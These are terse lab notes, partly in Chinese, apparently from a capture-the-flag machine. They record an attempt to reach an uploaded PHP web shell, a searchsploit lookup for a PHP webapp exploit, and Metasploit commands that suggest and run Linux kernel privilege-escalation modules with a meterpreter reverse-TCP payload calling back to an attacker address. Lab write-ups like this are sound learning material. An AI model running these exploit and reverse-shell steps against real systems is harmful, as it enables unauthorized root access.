连接错误 requests.exceptions.ConnectionError:HTTPConnectionPool(host='10.10.10.121',port=80):Max retries exceeded with url:/support/uploads/tickets/1cd2ed348346b00c48d3f78579d6431d.php(CausedbyNewConnectionError('<urllib3.connection.HTTPConnectionobjectat0x7f0def11a290>:Failed to establish a new connection: [Errno110] Connectiontimedout',)) --- searchsploit-mexploits/php/webapps/41200.py 需要一个可以登陆的口令
use post/multi/recon/local_exploit_suggester setSESSION2
[+] 10.10.10.121 - exploit/linux/local/bpf_priv_esc: The target appears to be vulnerable. [+] 10.10.10.121 - exploit/linux/local/bpf_sign_extension_priv_esc: The target appears to be vulnerable. [+] 10.10.10.121 - exploit/linux/local/glibc_realpath_priv_esc: The target appears to be vulnerable.
use exploit/linux/local/bpf_priv_esc setSESSION2 set LHOST 10.10.14.2 set LPORT 6679 showoptions run 失败
--- use exploit/linux/local/bpf_sign_extension_priv_esc set payload linux/x64/meterpreter_reverse_tcp set LHOST 10.10.14.2 set LPORT 6679 setSESSION2 showoptions run